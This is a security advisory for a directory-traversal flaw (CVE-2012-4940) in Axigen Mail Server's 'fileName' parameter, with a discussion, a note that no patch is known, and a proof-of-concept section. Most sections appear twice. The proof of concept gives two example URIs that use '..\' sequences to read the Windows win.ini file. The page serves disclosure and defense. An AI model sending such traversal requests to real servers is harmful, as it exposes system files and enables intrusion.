Axigen Mail Server 'fileName' Parameter Directory Traversal Vulnerability
BID:56343
Info
Axigen Mail Server 'fileName' Parameter Directory Traversal Vulnerability
| Bugtraq ID: | 56343 |
| Class: | Input Validation Error |
| CVE: |
CVE-2012-4940 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 31 2012 12:00AM |
| Updated: | Mar 19 2015 09:32AM |
| Credit: | Zhao Liang of Beijing Leadsec Technology Co. Ltd |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Axigen Mail Server 'fileName' Parameter Directory Traversal Vulnerability
Axigen Mail Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied data.
A remote attacker could exploit this vulnerability using directory-traversal strings (such as '../') to obtain sensitive information, cause a denial of service condition, or execute arbitrary code with the privileges of the application. This could help the attacker launch further attacks.
Axigen Mail Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied data.
A remote attacker could exploit this vulnerability using directory-traversal strings (such as '../') to obtain sensitive information, cause a denial of service condition, or execute arbitrary code with the privileges of the application. This could help the attacker launch further attacks.
Exploit / POC
Axigen Mail Server 'fileName' Parameter Directory Traversal Vulnerability
Attackers can exploit this issue through a browser.
The following example URIs are available:
http://www.example.com/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini
http://www.example.com/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini
Attackers can exploit this issue through a browser.
The following example URIs are available:
http://www.example.com/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini
http://www.example.com/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini
Solution / Fix
Axigen Mail Server 'fileName' Parameter Directory Traversal Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
Axigen Mail Server 'fileName' Parameter Directory Traversal Vulnerability
References:
References: